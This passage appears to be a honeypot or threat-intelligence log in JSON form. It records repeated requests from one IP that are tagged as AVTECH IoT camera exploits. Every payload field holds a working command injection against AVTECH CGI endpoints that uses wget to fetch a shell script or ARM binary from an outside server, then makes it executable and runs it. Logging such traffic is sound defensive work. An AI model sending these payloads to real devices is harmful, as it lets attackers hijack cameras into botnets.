- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8123,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:00:44Z",
- "last_seen": "2020-06-01T01:00:44Z"
- },
- {
- "event_id": "be9d007cea4a2e4b8628ee962303a2ac4cc9971e201b3f2576ef386f0acef579",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 16993,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T00:58:44Z",
- "last_seen": "2020-06-01T00:58:47Z"
- },
- {
- "event_id": "b1c668e0efacb67401acb3607e2c8c1f10ad4ffbb47c88077e4adf0e27d62fbd",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:58:47Z",
- "last_seen": "2020-06-01T00:58:47Z"
- },
- {
- "event_id": "7a63404053f5d77ee31adcd9a8c4865cd8687de13528e059f40ace37817dc447",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:58:45Z",
- "last_seen": "2020-06-01T00:58:45Z"
- },
- {
- "event_id": "2ec98375dd8f590d96b2f11de2b28cbd75078dd140914a8edf091ad4a9ece2d1",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 16993,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T00:58:41Z",
- "last_seen": "2020-06-01T00:58:45Z"
- },
- {
- "event_id": "c5b7ce396caf187f8f34e01e822fd6ca8bf609ff4a9328190274de8e33de16c2",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 4242,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:58:39Z",
- "last_seen": "2020-06-01T00:58:39Z"
- },
- {
- "event_id": "66774669ddeecae141481b7db67461e246280bef190c0d2d772b5fb4293dbf43",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 4242,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:58:37Z",
- "last_seen": "2020-06-01T00:58:37Z"
- },
- {
- "event_id": "dc309eb961027d3c9eabb7de7f6aa551f72740f7f3fb485465958de807abd97f",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7474,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:58:29Z",
- "last_seen": "2020-06-01T00:58:29Z"
- },
- {
- "event_id": "07dcfb2a0570eae5b5ddc076fc63dd6c64e6f2761cd7f9337dcf379cfba548a5",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T00:49:46Z",
- "last_seen": "2020-06-01T00:54:06Z"
- },
- {
- "event_id": "3eaa93cb3e429ae67bae977b298dc01d96c9074b0102d46c61f74a898fc73b0d",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8791,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:54:06Z",
- "last_seen": "2020-06-01T00:54:06Z"
- },
- {
- "event_id": "98c38527c71de30e9526fe169390d1289308c5c29ade34b83c84ac276a4399ec",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8791,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:54:04Z",
- "last_seen": "2020-06-01T00:54:04Z"
- },
- {
- "event_id": "20e4485c3beb83ba3845d7c311c18660be47cbecfbff1e4954045828faf3ddfa",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:52:01Z",
- "last_seen": "2020-06-01T00:52:01Z"
- },
- {
- "event_id": "6bddb37f00008001212a40b7dd200cd5728b31e592dc58c4141f99ee246b4d39",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8081,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:51:59Z",
- "last_seen": "2020-06-01T00:51:59Z"
- },
- {
- "event_id": "ff29f9422094258240c325dfb5cb4a654e38604a8f18aafbd533faebe32c6a44",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 4567,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:51:58Z",
- "last_seen": "2020-06-01T00:51:58Z"
- },
- {
- "event_id": "f29922af158cce313f32dc30890bd68f2656f01174e25b3b1b206f3fbab2f992",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:51:58Z",
- "last_seen": "2020-06-01T00:51:58Z"
- },
- {
- "event_id": "7d8d7f23ba6b95adeef7180be4bf6590d501c5ba26ade728bd9ca9a0067e33b5",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8081,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:51:57Z",
- "last_seen": "2020-06-01T00:51:57Z"
- },
- {
- "event_id": "ab329baa06870aff164484fae4beef73ba837e68b3cbf69c6c7216daee8305f3",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 4567,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:51:56Z",
- "last_seen": "2020-06-01T00:51:56Z"
- },
- {
- "event_id": "b4fd49cb5c643f0fc65ef87f6b63a808ed77a28c7425f2f956d4f530e33dcc34",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:51:56Z",
- "last_seen": "2020-06-01T00:51:56Z"
- },
- {
- "event_id": "89d57b9dd5585dc8a512c5abdd0151a809efcbfb313495e532a3ddc397836aeb",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T00:49:46Z",
- "last_seen": "2020-06-01T00:51:38Z"
- },
- {
- "event_id": "f02977697ac0665a407d514fe2736a4f36c88b41aeebeeb08114c8c825e4b26c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T00:49:44Z",
- "last_seen": "2020-06-01T00:51:36Z"
- },
- {
- "event_id": "8ba80991122ce2b17c590a67e42557a57ee1f2a1ed19d151885f0a3eb7a566d5",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:49:48Z",
- "last_seen": "2020-06-01T00:49:48Z"
- },
- {
- "event_id": "de56b2da23f04755844392d51218994f94b5580be94980d9bb246fc1ac2baafc",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:49:44Z",
- "last_seen": "2020-06-01T00:49:44Z"
- },
- {
- "event_id": "083a9a2b94c06c12a73f987c481e2b6db8031695c4c8368b8b70f42f94dca302",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:49:41Z",
- "last_seen": "2020-06-01T00:49:41Z"
- },
- {
- "event_id": "1b18a519f2614ad824ad0b2adf63aabc663f2261a0f1010438a27c2a0e01768b",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:49:23Z",
- "last_seen": "2020-06-01T00:49:23Z"
- },
- {
- "event_id": "19fb77491741fc2a488c3a80a00f38a5e5e5c0df008d619a341771c62c3e5706",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:49:21Z",
- "last_seen": "2020-06-01T00:49:21Z"
- },
- {
- "event_id": "21f9cc0e8845122fee99097f2ec36eebb0123e6f5528385e52d9fae6f70c9097",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:49:21Z",
- "last_seen": "2020-06-01T00:49:21Z"
- },
- {
- "event_id": "3e01e8c1e8789817ae0a1a5cf36f93a6686dfc4f00dac10b66c56ef96b4718e6",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:49:19Z",
- "last_seen": "2020-06-01T00:49:19Z"
- },
- {
- "event_id": "e9394af9611206bfe7d36f64f6a3c54b96640bc9bd290072867bedca2418151b",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:49:19Z",
- "last_seen": "2020-06-01T00:49:19Z"
- },
- {
- "event_id": "8e770d77e8c979a622f1273e962c796b5a6ded0f68c82bff8a78e55976cbda7e",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:49:18Z",
- "last_seen": "2020-06-01T00:49:18Z"
- },
- {
- "event_id": "54e786d880b9f52d393821072da7ac618dd4e291fd9af7cc210e864f97eb5ace",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:49:16Z",
- "last_seen": "2020-06-01T00:49:16Z"
- },
- {
- "event_id": "6743a8f4cd60f83b3b9bb3767265cd375decac613abe0099ebcd762f0e056f2d",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:48:54Z",
- "last_seen": "2020-06-01T00:48:54Z"
- },
- {
- "event_id": "51bcce9975c289454815a7428387c50f9867d0103bdf68d087ca687c73394318",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 72.UnHAnaAW.arm7; chmod 777 72.UnHAnaAW.arm7; ./72.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:48:52Z",
- "last_seen": "2020-06-01T00:48:52Z"
- },
- {
- "event_id": "b37b42b220ccdd10a890ddb27727cbac95daaedb7b7379773853d9a42f9f68bc",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:57Z",
- "last_seen": "2020-06-01T00:38:57Z"
- },
- {
- "event_id": "7fe723cd2659e1488c02fd3453cd8550159b7eabdf157477f52a7ff0cc883a4c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:56Z",
- "last_seen": "2020-06-01T00:38:56Z"
- },
- {
- "event_id": "97b65ee1dbfd23ab597027ba478f9ac74cb25d3d026ebfd91aae51fdb55a0c68",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:55Z",
- "last_seen": "2020-06-01T00:38:55Z"
- },
- {
- "event_id": "c7c460ed9b388f4f90644088ed529aa894952b8175dc88cabc6c64093b9e54e0",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:53Z",
- "last_seen": "2020-06-01T00:38:53Z"
- },
- {
- "event_id": "f96a2f341b14153399f21424756583a7b41f0ba505b445eab26b020b48d1c9d8",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av; echo urmum_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:52Z",
- "last_seen": "2020-06-01T00:38:52Z"
- },
- {
- "event_id": "1e6d4c805e0b6160f2eb87eaf4c1359c356a717bb80988fc7cfdabad7edf8140",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 39.UnHAnaAW.arm7; chmod 777 39.UnHAnaAW.arm7; ./39.UnHAnaAW.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T00:38:50Z",
